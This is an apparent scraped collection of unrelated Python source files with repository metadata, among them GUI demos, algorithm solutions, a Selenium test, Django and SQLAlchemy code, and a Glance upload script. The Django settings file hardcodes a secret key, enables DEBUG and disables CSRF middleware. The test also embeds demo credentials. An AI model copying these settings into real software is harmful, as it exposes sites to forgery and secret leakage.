print(LetterCapitalize("h3llo yo people"))
12b99157ef91baeba1b980e70567b5588589fb0c
a616d3f1491eae4a702d18ab30e2b3cfd43e1563
/scrollbar.py
a43c58dca1721d5742a1355ef8ec4ffaf02cb63d
[]
no_license
supriadi-yusuf/python-GUI
9d15c27fcaabb55aa61ccabef2afcc3f9a26370f
557ab9720442d7d810567441119c3efa4b1b7b34
refs/heads/master
2020-06-29T16:47:58.236428
2019-08-07T01:09:09
2019-08-07T01:09:09
200,570,926
0
0
null
null
null
null
UTF-8
Python
false
false
579
py
from tkinter import (
    Tk, RIGHT, Y, Scrollbar, Listbox, END, BOTH, LEFT
)

layar = Tk()
layar.title("Scrollbar")

myScrollbar = Scrollbar(master=layar)
#myScrollbar.pack(side=RIGHT, fill=Y)
#myScrollbar.pack(side=LEFT, fill=Y)

myList = Listbox(master=layar,
                 #height=5,
                 yscrollcommand=myScrollbar.set)
for line in range(100):
    myList.insert(END, "This is line number " + str(line))

#myList.pack(side=LEFT, fill=BOTH)
myList.pack(side=LEFT, fill=Y)

myScrollbar.pack(side=LEFT, fill=Y)
myScrollbar.config(command=myList.yview)

layar.mainloop()
40a5badf20a8815924f3d9ea4e245dba81149a88
ca7aa979e7059467e158830b76673f5b77a0f5a3
/Python_codes/p03588/s910432178.py
314d7a583d1067ee67cd31e93342774353c07a3a
[]
no_license
Aasthaengg/IBMdataset
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
refs/heads/main
2023-04-22T10:22:44.763102
2021-05-13T17:27:22
2021-05-13T17:27:22
367,112,348
0
0
null
null
null
null
UTF-8
Python
false
false
301
py
import sys


def solve():
    readline = sys.stdin.buffer.readline
    mod = 10 ** 9 + 7
    n = int(readline())
    ab = [list(map(int, readline().split())) for _ in range(n)]
    ab.sort()
    print((ab[-1][0] - ab[0][0] + 1) + (ab[0][0] - 1) + (ab[-1][1]))


if __name__ == '__main__':
    solve()
29062d2f0a805afd6dd76b3910c7c60daac28586
4178f2916d2da72cbb45454fbed941dcfe8f6460
/POM_test/TestCase/Planting/TC_024.py
c2bd74617e33da7d058bb5c6912275c3dd5bd85e
[]
no_license
maxcrup007/Selenium_Webdriver_Python
15196cb04ba5cafdc5b776c26d167f0b48fb0e14
6be7f0b9f53df1ba592957029e8a4d22e409d1c4
refs/heads/main
2023-03-24T21:04:31.976451
2021-03-22T09:16:04
2021-03-22T09:16:04
349,379,454
0
0
null
null
null
null
UTF-8
Python
false
false
2,607
py
# Test using the "Plant" feature (entering a planting amount larger than the plot area)
import time
import unittest
import sys
from selenium import webdriver
from POM_test.login import *
from POM_test.plantPage import *

import os
sys.path.append(os.path.join(os.path.dirname(__file__), "...", "..."))


class TestPlanting_24(unittest.TestCase):

    @classmethod
    def setUpClass(self):
        self.driver = webdriver.Chrome(executable_path="C:/Users/voraw/Downloads/Compressed/webdriver/chromedriver/chromedriver")
        self.driver.implicitly_wait(10)
        self.driver.maximize_window()

    def test_login_valid(self):
        driver = self.driver
        self.driver.get("https://top-upstream-client.mulberrysoft.com/#/older/activity")

        login = LoginPage(driver)
        login.enter_username("demo005")
        login.enter_password("123456")
        login.click_login()
        time.sleep(2)

        plant = PlantPage(driver)
        plant.into_plantPage()
        plant.upload_picture()
        time.sleep(2)
        plant.next_function()
        time.sleep(2)
        plant.plant_enter_value("1000000")   # planting amount larger than the plot area
        time.sleep(2)
        plant.plant_enter_area("10")
        time.sleep(2)
        plant.plant_enter_crops()
        time.sleep(2)

        # driver.find_element_by_xpath("//ion-list[2]/ion-item/ion-select").click()
        # driver.find_element_by_xpath("//button/div/div[2]").click()
        # driver.find_element_by_xpath("//button[2]/span").click()

        plant.plant_enter_garden()
        time.sleep(2)
        plant.plant_enter_unit()
        time.sleep(2)
        plant.plant_enter_area_unit()
        time.sleep(2)

        ########################################################################

        plant.plant_enter_products("100")
        time.sleep(2)
        plant.plant_enter_unit_products()
        time.sleep(2)
        plant.plant_enter_paid("1500")
        time.sleep(2)
        plant.plant_enter_submit()
        time.sleep(2)

    @classmethod
    def tearDownClass(cls):
        cls.driver.close()
        cls.driver.quit()
        print("Test Completed")


if __name__ == '__main__':
    unittest.main()
e3275a76d2f0ad30f2d8dc25ef528b0dd70399d0
6f9a29946dc107cd44d88cf07c9d715ebe4208be
/source/services/music/music_service.py
61d9a993b50f6a801a8e9c6457c4172dae92f090
[]
no_license
cash2one/gongzhuhao
66bb14439a2265175bdd4b2f585456fcf47922bf
0596bcb429674b75243d343c73e0f022b6d86820
refs/heads/master
2021-01-18T15:38:37.258737
2015-10-28T09:13:33
2015-10-28T09:13:33
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,709
py
#encoding:utf-8
__author__ = 'frank'

from services.base_services import BaseService
from models.share_do import ShareMusic
from utils.upload_utile import delete_from_oss
from tornado.options import options


class MusicServices(BaseService):

    def create_share_music(self, **kwargs):
        '''
        todo: add a new background song
        :param kwargs:
        :return:
        '''
        share_music = ShareMusic()
        share_music.Fmusic_name = kwargs.get('music_name')
        share_music.Fmusic_url = kwargs.get('request_url')
        self.db.add(share_music)
        self.db.commit()
        return share_music

    def query_share_music(self, **kwargs):
        '''
        todo: query background songs
        :param kwargs:
        :return:
        '''
        query = self.db.query(ShareMusic).filter(ShareMusic.Fdeleted == 0)
        if kwargs.get('start_date', ''):
            query = query.filter(ShareMusic.Fcreate_time > kwargs.get('start_date'))
        if kwargs.get('end_date', ''):
            query = query.filter(ShareMusic.Fcreate_time < kwargs.get('end_date') + ' 23:59:59')
        if kwargs.get('music_name', ''):
            query = query.filter(ShareMusic.Fmusic_name.like('%' + kwargs.get('music_name') + '%'))
        return query

    def delete_music(self, music_id):
        '''
        todo: delete a background song
        :param music_id: song id
        :return:
        '''
        query = self.db.query(ShareMusic).filter(ShareMusic.Fdeleted == 0, ShareMusic.Fid == music_id)
        filename = query.scalar().Fmusic_url[34:]
        data = {}
        data['Fdeleted'] = 1
        query.update(data)
        self.db.commit()
        delete_from_oss(options.MEDIA_BUCKET, filename)
ca80285ee2929ac20cf43ad7fff92fb60b9efdea
f81c8e4d702d5c88af92c691d35b6f9c0d2f4390
/backend/dark_waterfall_26026/wsgi.py
e5039146e98431c055564aea9a661c25a52173fd
[]
no_license
crowdbotics-apps/dark-waterfall-26026
bdfd44240dae3c1ad20ed8b7a8da701308db5958
95f9eda959b6d21778ff59db2c5c9a585d6a670c
refs/heads/master
2023-04-12T17:31:25.091727
2021-04-29T19:14:56
2021-04-29T19:14:56
362,922,208
0
0
null
null
null
null
UTF-8
Python
false
false
417
py
""" WSGI config for dark_waterfall_26026 project. It exposes the WSGI callable as a module-level variable named ``application``. For more information on this file, see https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/ """ import os from django.core.wsgi import get_wsgi_application os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'dark_waterfall_26026.settings') application = get_wsgi_application()
fa65a404c6278a30b5a8e1d2c8079c85f4f85dce
449f6888bff99d7e4fd86fa6ffa6b3316084e34e
/Solutions/018.py
b91be816ebd66827c26c6ae1526c59a9b3b118b9
[ "MIT" ]
permissive
All3yp/Daily-Coding-Problem-Solutions
e94679a5858b8a83ffe58d14b824fe80de21a694
199b9606474edb45bd14b20b511b691ada437586
refs/heads/master
2023-03-18T21:06:30.675503
2021-03-13T03:52:31
2021-03-13T03:52:31
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,622
py
""" Problem: Given an array of integers and a number k, where 1 <= k <= length of the array, compute the maximum values of each subarray of length k. For example, given array = [10, 5, 2, 7, 8, 7] and k = 3, we should get: [10, 7, 8, 8], since: 10 = max(10, 5, 2) 7 = max(5, 2, 7) 8 = max(2, 7, 8) 8 = max(7, 8, 7) Do this in O(n) time and O(k) space. You can modify the input array in-place and you do not need to store the results. You can simply print them out as you compute them. """ from collections import deque from typing import List def calc_max_per_k_elems(arr: List[int], k: int) -> List[int]: length = len(arr) if not arr: return None if length <= k: return max(arr) # storing results (even though the problem states it can be directly printed) result = [] dq = deque() # calculating the 1st element for i in range(k): while dq and arr[dq[-1]] < arr[i]: dq.pop() dq.append(i) result.append(arr[dq[0]]) # generating the rest of the resultant elements for i in range(k, length): # removing all elements apart from the last k elements while dq and dq[0] <= i - k: dq.popleft() # removing the elements smaller than the current element while dq and arr[dq[-1]] < arr[i]: dq.pop() dq.append(i) result.append(arr[dq[0]]) return result if __name__ == "__main__": print(calc_max_per_k_elems([10, 5, 2, 7, 8, 7], 3)) print(calc_max_per_k_elems([1, 91, 17, 46, 45, 36, 9], 3)) """ SPECS: TIME COMPLEXITY: O(n) SPACE COMPLEXITY: O(k) """
15b30860d116d827c4c3de9db43e689dffc3d70f
6c6531b6f93817a2720ff9b78fce6ad4d5bb500c
/PericiasMedicas/company/migrations/0007_auto_20191230_1711.py
5603642c2f74d64ccb13c8e644b23e6a6f6f2902
[]
no_license
massariolmc/periciasmedicas
6d3c142a5f5e308b049d57b30d698526c8aecda3
9b5b0e192bf51bb1b297f0983b2a0ab0c24b31b1
refs/heads/master
2022-12-08T11:13:10.981476
2020-02-21T23:32:44
2020-02-21T23:32:44
235,667,801
0
0
null
2022-11-22T05:15:44
2020-01-22T21:12:16
JavaScript
UTF-8
Python
false
false
472
py
# Generated by Django 2.2.7 on 2019-12-30 21:11

from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('company', '0006_auto_20191230_1629'),
    ]

    operations = [
        migrations.AlterField(
            model_name='company',
            name='state_registration',
            field=models.CharField(blank=True, default='', max_length=100, null=True, verbose_name='Inscrição Estadual'),
        ),
    ]
ae7a1e257d3423cfd604b1e6c27ffe19ee1012f5
6b3e8b4291c67195ad51e356ba46602a15d5fe38
/rastervision2/examples/utils.py
d521e74560b2de4494f0d0ff4344208ee3e221b0
[ "LicenseRef-scancode-generic-cla", "Apache-2.0" ]
permissive
csaybar/raster-vision
4f5bb1125d4fb3ae5c455db603d8fb749221dd74
617ca15f64e3b8a391432306a743f7d0dfff352f
refs/heads/master
2021-02-26T19:02:53.752971
2020-02-27T17:25:31
2020-02-27T17:25:31
245,547,406
2
1
NOASSERTION
2020-03-07T01:24:09
2020-03-07T01:24:08
null
UTF-8
Python
false
false
4,864
py
import csv
from io import StringIO
import tempfile
import os

import rasterio
from shapely.strtree import STRtree
from shapely.geometry import shape, mapping
import shapely.ops

from rastervision.core import Box
from rastervision.data import RasterioCRSTransformer, GeoJSONVectorSource
from rastervision.utils.files import (file_to_str, file_exists, get_local_path,
                                      upload_or_copy, make_dir, json_to_file)
from rastervision.filesystem import S3FileSystem


def str_to_bool(x):
    if type(x) == str:
        if x.lower() == 'true':
            return True
        elif x.lower() == 'false':
            return False
        else:
            raise ValueError('{} is expected to be true or false'.format(x))
    return x


def get_scene_info(csv_uri):
    csv_str = file_to_str(csv_uri)
    reader = csv.reader(StringIO(csv_str), delimiter=',')
    return list(reader)


def crop_image(image_uri, window, crop_uri):
    im_dataset = rasterio.open(image_uri)
    rasterio_window = window.rasterio_format()
    im = im_dataset.read(window=rasterio_window)

    with tempfile.TemporaryDirectory() as tmp_dir:
        crop_path = get_local_path(crop_uri, tmp_dir)
        make_dir(crop_path, use_dirname=True)

        meta = im_dataset.meta
        meta['width'], meta['height'] = window.get_width(), window.get_height()
        meta['transform'] = rasterio.windows.transform(
            rasterio_window, im_dataset.transform)

        with rasterio.open(crop_path, 'w', **meta) as dst:
            dst.colorinterp = im_dataset.colorinterp
            dst.write(im)

        upload_or_copy(crop_path, crop_uri)


def save_image_crop(image_uri,
                    image_crop_uri,
                    label_uri=None,
                    label_crop_uri=None,
                    size=600,
                    min_features=10,
                    vector_labels=True):
    """Save a crop of an image to use for testing.

    If label_uri is set, the crop needs to cover >= min_features.

    Args:
        image_uri: URI of original image
        image_crop_uri: URI of cropped image to save
        label_uri: optional URI of label file
        label_crop_uri: optional URI of cropped labels to save
        size: height and width of crop

    Raises:
        ValueError if cannot find a crop satisfying min_features constraint.
    """
    if not file_exists(image_crop_uri):
        print('Saving test crop to {}...'.format(image_crop_uri))
        old_environ = os.environ.copy()
        try:
            request_payer = S3FileSystem.get_request_payer()
            if request_payer == 'requester':
                os.environ['AWS_REQUEST_PAYER'] = request_payer
            im_dataset = rasterio.open(image_uri)
            h, w = im_dataset.height, im_dataset.width
            extent = Box(0, 0, h, w)
            windows = extent.get_windows(size, size)

            if label_uri and vector_labels:
                crs_transformer = RasterioCRSTransformer.from_dataset(
                    im_dataset)
                vs = GeoJSONVectorSource(label_uri, crs_transformer)
                geojson = vs.get_geojson()
                geoms = []
                for f in geojson['features']:
                    g = shape(f['geometry'])
                    geoms.append(g)
                tree = STRtree(geoms)

                def p2m(x, y, z=None):
                    return crs_transformer.pixel_to_map((x, y))

            for w in windows:
                use_window = True
                if label_uri and vector_labels:
                    w_polys = tree.query(w.to_shapely())
                    use_window = len(w_polys) >= min_features
                    if use_window and label_crop_uri is not None:
                        print('Saving test crop labels to {}...'.format(
                            label_crop_uri))
                        label_crop_features = [
                            mapping(shapely.ops.transform(p2m, wp))
                            for wp in w_polys
                        ]
                        label_crop_json = {
                            'type': 'FeatureCollection',
                            'features': [{'geometry': f}
                                         for f in label_crop_features]
                        }
                        json_to_file(label_crop_json, label_crop_uri)

                if use_window:
                    crop_image(image_uri, w, image_crop_uri)

                    if not vector_labels and label_uri and label_crop_uri:
                        crop_image(label_uri, w, label_crop_uri)

                    break

            if not use_window:
                raise ValueError('Could not find a good crop.')
        finally:
            os.environ.clear()
            os.environ.update(old_environ)
6035dce05ab1ceb238455998bedfa82823ff466e
3471728291ab015e6780763218f96a369897f5c4
/imagefactory_plugins/OpenStack/glance_upload.py
c2b28347f49d65700b6205043a0e6637b27930f4
[ "Apache-2.0" ]
permissive
zyga/imagefactory
913fb4a987a746cff72f3074e0e338e896ac2e65
b2a57168f1ef6608aedad73ed7ccd1e3626b2967
refs/heads/master
2020-03-24T07:33:43.270977
2018-06-26T19:37:55
2018-06-26T19:37:55
142,568,326
1
0
Apache-2.0
2018-07-27T11:20:36
2018-07-27T11:20:36
null
UTF-8
Python
false
false
1,452
py
# Copyright 2012 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#       http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

from glance import client as glance_client
from pprint import pprint


def glance_upload(image_filename,
                  creds={'auth_url': None, 'password': None,
                         'strategy': 'noauth', 'tenant': None,
                         'username': None},
                  host="0.0.0.0", port="9292", token=None):
    image_meta = {'container_format': 'bare',
                  'disk_format': 'qcow2',
                  'is_public': True,
                  'min_disk': 0,
                  'min_ram': 0,
                  'name': 'Factory Test Image',
                  'properties': {'distro': 'rhel'}}

    c = glance_client.Client(host=host, port=port, auth_tok=token, creds=creds)
    image_data = open(image_filename, "r")
    image_meta = c.add_image(image_meta, image_data)
    image_data.close()
    return image_meta['id']


image_id = glance_upload("/root/base-image-f19e3f9b-5905-4b66-acb2-2e25395fdff7.qcow2")
print image_id
c801f423eba575edaad8ae847ba8affbbb0388d1
7e2214619d5948d0d5f7e22f46dee679d722d7b3
/dealOrNoDeal.py
309ffe88c017c45a4345d69b454a2286181be26f
[]
no_license
udwivedi394/misc
ef6add31a92e0d2d0505e8be016f0a868a6ac730
64dffb5db04c38465fffb415bec1d433b1caa8f6
refs/heads/master
2021-09-09T06:16:32.124586
2018-03-14T05:10:55
2018-03-14T05:10:55
116,167,845
0
0
null
null
null
null
UTF-8
Python
false
false
1,934
py
#Nest away
import sys


def dealorNoDeal05(A, B):
    lookup = [B - i for i in A]
    maxi = 0
    for i in xrange(1, len(lookup)):
        if lookup[i] >= 0:
            lookup[i] = lookup[i] + (lookup[i-1] if lookup[i-1] >= 0 else 0)
            maxi = max(maxi, lookup[i])
    return maxi


def dealorNoDeal(A, B):
    lookup = A  # [B-i for i in A]
    maxi = 0
    for i in xrange(len(lookup)):
        lookup[i] = max(lookup[i], lookup[i] + lookup[i-1] if i > 0 else 0)
        maxi = max(maxi, lookup[i])
    return maxi


def dealorNoDeal03(A, B):
    lookup = A
    for i in xrange(len(lookup)):
        lookup[i] = B - lookup[i]
    maxi = 0
    for i in xrange(1, len(lookup)):
        if lookup[i] >= 0:
            lookup[i] = lookup[i] + (lookup[i-1] if lookup[i-1] >= 0 else 0)
            maxi = max(maxi, lookup[i])
    return maxi


def dealorNoDeal04(A, B):
    lookup = A
    maxi = 0
    for i in xrange(len(lookup)):
        if B - lookup[i] >= 0:
            lookup[i] = (B - lookup[i]) + (lookup[i-1] if i > 0 and lookup[i-1] >= 0 else 0)
            maxi = max(maxi, lookup[i])
        else:
            lookup[i] = B - lookup[i]
    print lookup
    return maxi


"""
if __name__=="__main__":
    f1 = open("testCaseMaxSeq02.txt",'r')
    for x in xrange(int(f1.readline().strip())):
        #n,c = map(int,sys.stdin.readline().strip().split())
        n = map(int,f1.readline().strip().split())
        A = map(int,f1.readline().strip().split())
        c = 0
        result = dealorNoDeal(A,c)
        sys.stdout.write(str(result))
        print
    f1.close()
"""

if __name__ == "__main__":
    for x in xrange(int(sys.stdin.readline().strip())):
        n, c = map(int, sys.stdin.readline().strip().split())
        #n = map(int,sys.stdin.readline().strip().split())
        A = map((lambda x: c - int(x)), sys.stdin.readline().strip().split())
        #c = 0
        result = dealorNoDeal(A, c)
        sys.stdout.write(str(result))
        print  #"""
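# A minimal Python 3 sketch (not from the original file) of the Kadane-style
# recurrence the variants above are all circling around: track the best sum of
# a subarray ending at the current element, clamped with max() instead of the
# if-chains used above. The original first maps each value x to c - x before
# running this recurrence.
def max_subarray_sum(values):
    best = current = 0          # the empty subarray scores 0, as in dealorNoDeal
    for v in values:
        current = max(v, current + v)
        best = max(best, current)
    return best

assert max_subarray_sum([2, -1, 3, -4]) == 4    # 2 - 1 + 3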
c2835b1f8a3632284eca779d2dc1f17bfaf30295
6d501ea43b1a52bf4af44ae5677eba8b928ffec3
/directory/signals.py
e1d22e0a309d7321f2db634715374ef5fabc6e4f
[]
no_license
mozilla/hive-django
78d5e7bf687e2311a41d2b6d555b9671c4270b4d
bf95dce0af0148ecacde2256d235788fd79c7d5e
refs/heads/master
2023-08-27T12:47:36.977377
2016-05-04T21:12:47
2016-05-04T21:12:47
55,106,672
0
2
null
2016-05-04T21:12:47
2016-03-31T00:12:58
Python
UTF-8
Python
false
false
1,684
py
from django.dispatch import receiver
from django.contrib.sites.models import Site
from django.db.models.signals import post_save
from django.contrib.auth.signals import user_logged_in
from django.contrib import messages
from registration.signals import user_activated

from .models import City, User, Organization, Membership, is_user_vouched_for


@receiver(post_save, sender=City)
def clear_site_cache_when_city_changes(**kwargs):
    # It's possible that the site may be associated with a different
    # city now, so clear the site cache.
    Site.objects.clear_cache()


@receiver(post_save, sender=User)
def create_membership_for_user(sender, raw, instance, **kwargs):
    if raw:
        return
    if not len(Membership.objects.filter(user=instance)):
        membership = Membership(user=instance)
        membership.save()


@receiver(user_activated)
def auto_register_user_with_organization(sender, user, request, **kwargs):
    if user.membership.organization:
        return
    orgs = Organization.objects.possible_affiliations_for(user)
    if orgs.count() != 1:
        return
    org = orgs[0]
    user.membership.organization = org
    user.membership.save()


@receiver(user_logged_in)
def tell_user_to_update_their_profile(sender, user, request, **kwargs):
    if not is_user_vouched_for(user):
        return
    if not user.membership.bio:
        messages.info(request, 'You don\'t have a bio! You should write one '
                      'so community members can learn more about you. '
                      'Just visit your user profile by accessing the '
                      'user menu at the top-right corner of this page.',
                      fail_silently=True)
98616241fbdcb931bae105f55cdfe34251a2d974
26408f11b938a00f8b97a3e195095a45a12dc2c7
/sneeze/Player.py
e1aecbdfcc7127f7257b5d20b68035b164acb822
[]
no_license
cz-fish/sneeze-dodger
a7ea25e9267d408e8f46a9fb7a988d52dca8bd8e
4fd333345d1f7d82c92ddcb15f18077362766844
refs/heads/master
2022-07-07T01:39:06.162125
2020-05-18T08:01:57
2020-05-18T08:01:57
255,090,774
0
0
null
null
null
null
UTF-8
Python
false
false
849
py
from sneeze.Actor import Actor
from sneeze.Sprite import Sprite
from sneeze.Types import *


class Player(Actor):
    def __init__(self):
        super().__init__()
        self.sprite = Sprite.load('guy')

    def move(self, inputs: Inputs, collision) -> None:
        self.update_speed(inputs.xvalue, inputs.yvalue)
        new_pos = collision(self.pos, self.speed_vec)
        if new_pos == self.pos:
            self.speed_vec = Pos(0, 0)
        self.move_to(new_pos)

        # walk phase; reset if not moving
        if abs(self.speed_vec.x) < 2 and abs(self.speed_vec.y) < 2:
            self.animation = Animation('idle', 0)
        else:
            key, phase = self.animation
            if key == 'walk':
                self.animation = Animation(key, phase + 1)
            else:
                self.animation = Animation('walk', 0)
c3b2ccf3279e3d6c131b50d1a8a089fc8ee00b32
5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d
/alipay/aop/api/domain/BizListDataInfo.py
5f874dfae528b4b6592ad1306c025ec59eb0239e
[ "Apache-2.0" ]
permissive
alipay/alipay-sdk-python-all
8bd20882852ffeb70a6e929038bf88ff1d1eff1c
1fad300587c9e7e099747305ba9077d4cd7afde9
refs/heads/master
2023-08-27T21:35:01.778771
2023-08-23T07:12:26
2023-08-23T07:12:26
133,338,689
247
70
Apache-2.0
2023-04-25T04:54:02
2018-05-14T09:40:54
Python
UTF-8
Python
false
false
1,206
py
#!/usr/bin/env python
# -*- coding: utf-8 -*-

import json

from alipay.aop.api.constant.ParamConstants import *


class BizListDataInfo(object):

    def __init__(self):
        self._code = None
        self._name = None

    @property
    def code(self):
        return self._code

    @code.setter
    def code(self, value):
        self._code = value

    @property
    def name(self):
        return self._name

    @name.setter
    def name(self, value):
        self._name = value

    def to_alipay_dict(self):
        params = dict()
        if self.code:
            if hasattr(self.code, 'to_alipay_dict'):
                params['code'] = self.code.to_alipay_dict()
            else:
                params['code'] = self.code
        if self.name:
            if hasattr(self.name, 'to_alipay_dict'):
                params['name'] = self.name.to_alipay_dict()
            else:
                params['name'] = self.name
        return params

    @staticmethod
    def from_alipay_dict(d):
        if not d:
            return None
        o = BizListDataInfo()
        if 'code' in d:
            o.code = d['code']
        if 'name' in d:
            o.name = d['name']
        return o
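# Usage sketch (invented values): round-trip a plain dict through the two
# converters defined above.
info = BizListDataInfo.from_alipay_dict({'code': 'C01', 'name': 'demo'})
print(info.to_alipay_dict())   # {'code': 'C01', 'name': 'demo'}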
0df491aaf04bd5efd3e1d19660af119f72bb10a1
93a959b0458bcdb60d33a4504f483078a78a56b6
/CwnGraph/cwn_annotator.py
7b58fe2e65d190fd9571cc70e6a5695b91cfcc2f
[]
no_license
kylecomtw/CwnGraph
a82d763a645c3342502274e6760cb63593f23d42
86ddb17de548a61c57f925fb2d783467431db18b
refs/heads/master
2021-10-24T10:00:19.913420
2019-03-25T04:45:36
2019-03-25T04:45:36
84,843,165
3
2
null
null
null
null
UTF-8
Python
false
false
5,050
py
import os
import json
from datetime import datetime

from . import cwnio
from . import annot_merger
from .cwn_types import *
from .cwn_graph_utils import CwnGraphUtils


class CwnAnnotator:
    PREFIX = "annot/cwn_annot"

    def __init__(self, cgu, session_name):
        self.parent_cgu = cgu
        self.name = session_name
        self.V = {}
        self.E = {}
        self.meta = {
            "session_name": session_name,
            "timestamp": "",
            "serial": 0,
            "base_hash": cgu.get_hash()
        }
        self.load(session_name)

    def load(self, name):
        fpath = f"{CwnAnnotator.PREFIX}_{name}.json"
        if os.path.exists(fpath):
            print("loading saved session from ", fpath)
            self.meta, self.V, self.E = \
                cwnio.load_annot_json(fpath)
            base_hash = self.meta.get("base_hash", "")
            if base_hash and base_hash != self.parent_cgu.get_hash():
                print("WARNING: loading with a different base image")
            return True
        else:
            print("Creating new session", name)
            return False

    def save(self, with_timestamp=False):
        name = self.meta["session_name"]
        timestamp = datetime.now().strftime("%y%m%d%H%M%S")
        self.meta["snapshot"] = timestamp
        cwnio.ensure_dir("annot")
        if with_timestamp:
            cwnio.dump_annot_json(self.meta, self.V, self.E,
                                  f"{CwnAnnotator.PREFIX}_{name}_{timestamp}.json")
        else:
            cwnio.dump_annot_json(self.meta, self.V, self.E,
                                  f"{CwnAnnotator.PREFIX}_{name}.json")

    def new_node_id(self):
        serial = self.meta.get("serial", 0) + 1
        session_name = self.meta.get("session_name", "")
        self.meta["serial"] = serial
        return f"{session_name}_{serial:06d}"

    def create_lemma(self, lemma):
        node_id = self.new_node_id()
        new_lemma = CwnLemma(node_id, self)
        new_lemma.lemma = lemma
        self.set_lemma(new_lemma)
        return new_lemma

    def create_sense(self, definition):
        node_id = self.new_node_id()
        new_sense = CwnSense(node_id, self)
        new_sense.definition = definition
        self.set_sense(new_sense)
        return new_sense

    def create_relation(self, src_id, tgt_id, rel_type):
        if not self.get_node_data(src_id):
            raise ValueError(f"{src_id} not found")
        if not self.get_node_data(tgt_id):
            raise ValueError(f"{tgt_id} not found")
        edge_id = (src_id, tgt_id)
        new_rel = CwnRelation(edge_id, self)
        new_rel.relation_type = rel_type
        self.set_relation(new_rel)
        return new_rel

    def set_lemma(self, cwn_lemma):
        self.V[cwn_lemma.id] = cwn_lemma.data()

    def set_sense(self, cwn_sense):
        self.V[cwn_sense.id] = cwn_sense.data()

    def set_relation(self, cwn_relation):
        self.E[cwn_relation.id] = cwn_relation.data()

    def remove_lemma(self, cwn_lemma):
        cwn_lemma.action = "delete"
        self.set_lemma(cwn_lemma)

    def remove_sense(self, cwn_sense):
        cwn_sense.action = "delete"
        self.set_sense(cwn_sense)

    def remove_relation(self, cwn_relation):
        cwn_relation.action = "delete"
        self.set_relation(cwn_relation)

    def find_glyph(self, instr):
        return self.parent_cgu.find_glyph(instr)

    def find_senses(self, lemma="", definition="", examples=""):
        cgu = CwnGraphUtils(self.V, self.E)
        senses = cgu.find_senses(lemma, definition, examples)
        parent_senses = self.parent_cgu.find_senses(lemma, definition, examples)
        ret = annot_merger.merge(senses, parent_senses, self)
        return ret

    def find_lemmas(self, instr_regex):
        cgu = CwnGraphUtils(self.V, self.E)
        lemmas = cgu.find_lemma(instr_regex)
        parent_lemmas = self.parent_cgu.find_lemma(instr_regex)
        ret = annot_merger.merge(lemmas, parent_lemmas, self)
        return ret

    def find_edges(self, node_id, is_directed=True):
        cgu = CwnGraphUtils(self.V, self.E)
        edges = cgu.find_edges(node_id, is_directed)
        parent_edges = self.parent_cgu.find_edges(node_id, is_directed)
        ret = annot_merger.merge(edges, parent_edges, self)
        return ret

    def get_node_data(self, node_id):
        node_data = self.V.get(node_id, {})
        if not node_data:
            node_data = self.parent_cgu.get_node_data(node_id)
        return node_data

    def get_edge_data(self, edge_id):
        edge_data = self.E.get(edge_id, {})
        if not edge_data:
            edge_data = self.parent_cgu.get_edge_data(edge_id)
        return edge_data

    def connected(self, node_id, is_directed=True, maxConn=100, sense_only=True):
        raise NotImplementedError("connected() is not implemented in CwnAnnotator")
127f14137ff8c69323cb99a5ec67d900927cca5e
4b17225bc3860419edb6a8818bbac82e6b36e79d
/employee_tracker/settings.py
ce1b5d600785fc29625c723fdb419d1d986f35e8
[]
no_license
argon2008-aiti/employee_tracker
8ab45ee727e07b242d6ac3fb446ca5c1b9649bb0
5be7c3bb323f3b350d26df4d4813b6b071324277
refs/heads/master
2021-01-15T13:00:03.644233
2016-10-06T16:42:28
2016-10-06T16:42:28
35,000,045
0
0
null
null
null
null
UTF-8
Python
false
false
3,444
py
""" Django settings for employee_tracker project. For more information on this file, see https://docs.djangoproject.com/en/1.6/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/1.6/ref/settings/ """ # Build paths inside the project like this: os.path.join(BASE_DIR, ...) import os BASE_DIR = os.path.dirname(os.path.dirname(__file__)) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = 'cdkxms9u50qs@ig3j3s771u55ntlvxp2h8pijlx2rr83ms)#7q' # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True TEMPLATE_DEBUG = True ALLOWED_HOSTS = [".herokuapp.com"] # Application definition INSTALLED_APPS = ( 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'south', 'monitor', 'leaflet', 'djgeojson', 'django_ajax', ) MIDDLEWARE_CLASSES = ( 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', #'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ) ROOT_URLCONF = 'employee_tracker.urls' WSGI_APPLICATION = 'employee_tracker.wsgi.application' # Database # https://docs.djangoproject.com/en/1.6/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'), } } # for graphviz GRAPH_MODELS = { } # Internationalization # https://docs.djangoproject.com/en/1.6/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/1.6/howto/static-files/ # static file directories STATICFILES_DIRS = ( ('assets', 'static'), ) # base url at which static files are served STATIC_URL = '/assets/' STATIC_ROOT = os.path.join(BASE_DIR,'assets') LOGIN_URL = '/login' STATICFILES_FINDERS = ( 'django.contrib.staticfiles.finders.FileSystemFinder', 